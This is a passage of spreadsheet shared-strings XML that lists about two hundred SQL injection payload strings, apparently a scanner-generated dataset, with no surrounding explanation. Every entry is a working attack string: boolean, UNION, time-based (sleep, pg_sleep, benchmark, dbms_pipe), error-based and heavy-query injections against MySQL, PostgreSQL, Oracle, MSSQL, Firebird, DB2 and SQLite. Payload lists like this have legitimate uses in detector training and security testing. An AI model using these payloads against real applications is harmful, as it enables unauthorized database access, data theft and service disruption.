    <t>-6500'  )  )   or  ( 8459 = 8459 ) *4906 and   (  (  'padu' like 'padu</t>
  </si>
  <si>
    <t>-2901" or elt ( 9866 = 9099,9099 )  and "asib" like "asib</t>
  </si>
  <si>
    <t>-6924' )  union all select 2046,2046,2046,2046,2046,2046,2046--</t>
  </si>
  <si>
    <t>1 )  where 6304 = 6304</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) </t>
  </si>
  <si>
    <t>1" )  where 8588 = 8588</t>
  </si>
  <si>
    <t>1 )  as lhie where 4631 = 4631 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 5885 = 1825 )  then 1 else 5885* ( select 5885 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'nhuk' = 'nhuk</t>
  </si>
  <si>
    <t>1'  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( 'ugrk' = 'ugrk</t>
  </si>
  <si>
    <t>1%' )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1" and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and "krtr" like "krtr</t>
  </si>
  <si>
    <t>-9371' )  union all select 5900,5900,5900#</t>
  </si>
  <si>
    <t>-5624' union all select 3723,3723,3723,3723,3723--</t>
  </si>
  <si>
    <t>1'+ ( select onzd where 8452 = 8452 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  +'</t>
  </si>
  <si>
    <t>1  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) -- fzhj</t>
  </si>
  <si>
    <t>-6680%"  )  )   union all select 3719,3719,3719,3719,3719,3719,3719,3719,3719--</t>
  </si>
  <si>
    <t>select case when 1802 = 7063 then 1 else null end--</t>
  </si>
  <si>
    <t>1 union all select null#</t>
  </si>
  <si>
    <t>-2793' )  where 2621 = 2621 union all select 2621#</t>
  </si>
  <si>
    <t>-9601'  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1' )  and 5999 = 5879</t>
  </si>
  <si>
    <t>1' and elt ( 1210 = 1210,sleep ( 5  )  )   and 'pjrf' = 'pjrf</t>
  </si>
  <si>
    <t>1"  )  )   as uqem where 3521 = 3521</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'+ ( select 'drqj' where 1246 = 1246</t>
  </si>
  <si>
    <t>-4340  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  8505 = 8505</t>
  </si>
  <si>
    <t>1" where 5977 = 5977</t>
  </si>
  <si>
    <t>1%" )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 )  union all select null#</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )  # idxq</t>
  </si>
  <si>
    <t>1"  )  )   as dvpb where 6673 = 6673</t>
  </si>
  <si>
    <t>1' in boolean mode )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1" )  where 1705 = 1705</t>
  </si>
  <si>
    <t>1 )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( 6518 = 6518</t>
  </si>
  <si>
    <t>1%" )  and elt ( 4249 = 4249,7259 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'maln' like 'maln</t>
  </si>
  <si>
    <t>1' or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'wwwb' = 'wwwb</t>
  </si>
  <si>
    <t>1" )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "hbfr" like "hbfr</t>
  </si>
  <si>
    <t>1 )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( 3872 = 3872</t>
  </si>
  <si>
    <t>1"  )  )   as etap where 8506 = 8506 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1' where 4701 = 4701 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>-3116  )  )   as jyiq where 3875 = 3875 union all select 3875,3875,3875,3875,3875,3875,3875,3875#</t>
  </si>
  <si>
    <t>1"  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  "tvla" = "tvla</t>
  </si>
  <si>
    <t>1" )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( "rwlq" = "rwlq</t>
  </si>
  <si>
    <t>1' )  where 8274 = 8274</t>
  </si>
  <si>
    <t>-8453  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1'+ ( select 'dhcv' where 9372 = 9372</t>
  </si>
  <si>
    <t>-1339  )  )   )  union all select 6318,6318,6318,6318,6318,6318,6318,6318,6318#</t>
  </si>
  <si>
    <t>1  )  )   as nwyh where 7100 = 7100</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and 'hhrw' like 'hhrw</t>
  </si>
  <si>
    <t>1" )  where 5828 = 5828 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1%" or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-9522 )  as lraw where 9472 = 9472 or  ( 4087 = 8213 ) *8213--</t>
  </si>
  <si>
    <t>1'+ ( select 'yfrs' where 4388 = 4388 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  'xcxr' like 'xcxr</t>
  </si>
  <si>
    <t>1" )  where 6255 = 6255 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1' )  where 6774 = 6774 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1' )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( 'amjh' = 'amjh</t>
  </si>
  <si>
    <t>-8922 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) -- krmh</t>
  </si>
  <si>
    <t>-4473' )  union all select 7656,7656#</t>
  </si>
  <si>
    <t>-9758'+ ( select 'rlcy' where 3691 = 3691 union all select 3691,3691,3691,3691,3691,3691,3691--</t>
  </si>
  <si>
    <t>1' or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'ibav' = 'ibav</t>
  </si>
  <si>
    <t>select  ( case when  ( 5847 = 2826 )  then 5847 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and "icow" like "icow</t>
  </si>
  <si>
    <t>-8010' or  ( 2225 = 8491 ) *8491 and 'eipf' = 'eipf</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (   ( "uvzc" like "uvzc</t>
  </si>
  <si>
    <t>1"  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  "cyyh" = "cyyh</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( 'ycte' = 'ycte</t>
  </si>
  <si>
    <t>-1401"  )  )   union all select 3480,3480,3480,3480,3480,3480--</t>
  </si>
  <si>
    <t>1'+ ( select 'arqt' where 2336 = 2336 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( 'qdhz' = 'qdhz</t>
  </si>
  <si>
    <t>1" )  as nyui where 2511 = 2511</t>
  </si>
  <si>
    <t>1' )  and  ( 2763 = 4004 ) *4004 and  ( 'dtts' = 'dtts</t>
  </si>
  <si>
    <t>1'  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  'wgpg' like 'wgpg</t>
  </si>
  <si>
    <t>1 )  as ezje where 5234 = 5234 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>-7633' )  as aslj where 2317 = 2317 or 8571 = 8571--</t>
  </si>
  <si>
    <t>1"  )  )   as wfne where 8933 = 8933</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( 3124 = 3124</t>
  </si>
  <si>
    <t>-9581 )  as jkqo where 5200 = 5200 or 6872 = 6872--</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1"  )  )   as yfpl where 4820 = 4820 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( "woun" like "woun</t>
  </si>
  <si>
    <t>1%'  )  )   and 3721 = 2597#</t>
  </si>
  <si>
    <t>1 where 9279 = 9279 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  "prhp" = "prhp</t>
  </si>
  <si>
    <t>1" )  and sleep ( 5 )  and  ( "fsuf" like "fsuf</t>
  </si>
  <si>
    <t>1%" )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq ) -- mmjk</t>
  </si>
  <si>
    <t>-3817" )  as vugz where 3064 = 3064 or 9323 = 9323#</t>
  </si>
  <si>
    <t>-6802 )  as coyv where 5693 = 5693 or 8571 = 8571--</t>
  </si>
  <si>
    <t>1'  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'bfrq' like 'bfrq</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (   ( 'wesl' = 'wesl</t>
  </si>
  <si>
    <t>1 )  as fgqe where 1526 = 1526 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1%' and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and "gddl" like "gddl</t>
  </si>
  <si>
    <t>1%" and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and "%" = "</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-9565" where 1616 = 1616 union all select 1616,1616,1616,1616--</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  </t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (   ( 'thqr' like 'thqr</t>
  </si>
  <si>
    <t xml:space="preserve">1" or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) </t>
  </si>
  <si>
    <t>select * from generate_series ( 2382,2382,case when  ( 2382 = 4352 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>-9098'|| ( select 'xodn' from dual where 8202 = 8202 union all select 8202,8202,8202,8202,8202,8202,8202--</t>
  </si>
  <si>
    <t>1" )  where 6859 = 6859 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'|| ( select 'tdcr' where 6792 = 6792 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  'btnl' = 'btnl</t>
  </si>
  <si>
    <t>1"  )  )   and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-1844" where 7948 = 7948 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 11</t>
  </si>
  <si>
    <t>1 where 1886 = 1886 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select lhho where 7579 = 7579 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'uetb' where 6468 = 6468</t>
  </si>
  <si>
    <t>1'  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( 'weof' = 'weof</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" and 7533 = 7533</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( 'yvbb' = 'yvbb</t>
  </si>
  <si>
    <t>1"  )  )   or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1%' )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   as gocb where 4335 = 4335</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) </t>
  </si>
  <si>
    <t>1' )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( 'mhvy' like 'mhvy</t>
  </si>
  <si>
    <t xml:space="preserve">-5529" or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) </t>
  </si>
  <si>
    <t>1' or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-7246'|| ( select 'qchp' from dual where 8317 = 8317 order by 1--</t>
  </si>
  <si>
    <t>-1796' )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr</t>
  </si>
  <si>
    <t>1%'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" where 9669 = 9669</t>
  </si>
  <si>
    <t>select  ( case when  ( 3414 = 8741 )  then 3414 else 3414* ( select 3414 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( "bqfj" like "bqfj</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (   ( 'etzb' = 'etzb</t>
  </si>
  <si>
    <t>1  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  6659 = 6659</t>
  </si>
  <si>
    <t>-8636'  )  )   )  or 4301 = 7212--</t>
  </si>
  <si>
    <t>1'+ ( select 'yahd' where 5850 = 5850</t>
  </si>
  <si>
    <t>1 )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( 7338 = 7338</t>
  </si>
  <si>
    <t>-9896"  )  )   )  union all select 4073,4073,4073,4073,4073#</t>
  </si>
  <si>
    <t>1"  )  )   as pafp where 6770 = 6770 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1' )  where 3255 = 3255 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%' )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-5702'  )  )   )  union all select 7806,7806,7806,7806,7806--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   as myws where 5274 = 5274</t>
  </si>
  <si>
    <t>-2460%" )  or  ( 2660 = 5767 ) *5767 and  ( "%" = "</t>
  </si>
  <si>
    <t>1  )  )   as smtf where 5829 = 5829</t>
  </si>
  <si>
    <t>1'  )  )   as zbkp where 1720 = 1720 and 4110 = 6748#</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( 3950 = 3950</t>
  </si>
  <si>
    <t>1%'  )  )   and 7160 = 7249--</t>
  </si>
  <si>
    <t>1' and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 where 2278 = 2278 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>-5998" )  as gazd where 2814 = 2814 union all select 2814,2814,2814,2814,2814,2814,2814--</t>
  </si>
  <si>
    <t>1'  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  'beoh' = 'beoh</t>
  </si>
  <si>
    <t xml:space="preserve"> end and 'wdce' = 'wdce</t>
  </si>
  <si>
    <t>1%"  )  )   or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1'  )  )   )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 'swua' like 'swua</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( "wwaq" = "wwaq</t>
  </si>
  <si>
    <t>-2300 )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 )</t>
  </si>
  <si>
    <t>-5585%'  )  )   )  or 6990 = 7727</t>
  </si>
  <si>
    <t>-2263' )  where 7931 = 7931 union all select 7931,7931,7931--</t>
  </si>
  <si>
    <t>1"  )  )   union all select null#</t>
  </si>
  <si>
    <t>1'+ ( select jrmz where 4762 = 4762 and elt ( 9588 = 9794,9794  )  )  +'</t>
  </si>
  <si>
    <t>-8982'+ ( select anyd where 5358 = 5358 union all select 5358,5358,5358,5358,5358,5358#</t>
  </si>
  <si>
    <t>1'+ ( select oogh where 1167 = 1167 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1'+ ( select 'wyed' where 9896 = 9896</t>
  </si>
  <si>
    <t>1" )  as eomu where 6599 = 6599</t>
  </si>
  <si>
    <t>1' )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 'cqrp' = 'cqrp</t>
  </si>
  <si>
    <t>select  ( case when  ( 4297 = 9086 )  then 4297 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1' where 7504 = 7504 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%" and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>1 where 6383 = 6383 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1 where 6173 = 6173</t>
  </si>
  <si>
    <t>1'  )  )   as txxn where 7884 = 7884 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) +'</t>
  </si>
  <si>
    <t>1'  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'qgdv' = 'qgdv</t>
  </si>
  <si>
    <t>-9163" union all select 3820,3820,3820,3820,3820,3820,3820,3820,3820#</t>
  </si>
  <si>
    <t>1" where 9461 = 9461</t>
  </si>
  <si>
    <t>1'+ ( select 'tyuz' where 3957 = 3957 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>-6353%'  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113</t>
  </si>
  <si>
    <t>1'+ ( select dnxi where 5850 = 5850 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  "rfam" like "rfam</t>
  </si>
  <si>
    <t>-3246%' union all select 4012#</t>
  </si>
  <si>
    <t>1%' )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  ( 'qpdu' = 'qpdu</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) </t>
  </si>
  <si>
    <t>1'  )  )   as jbcd where 9078 = 9078 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
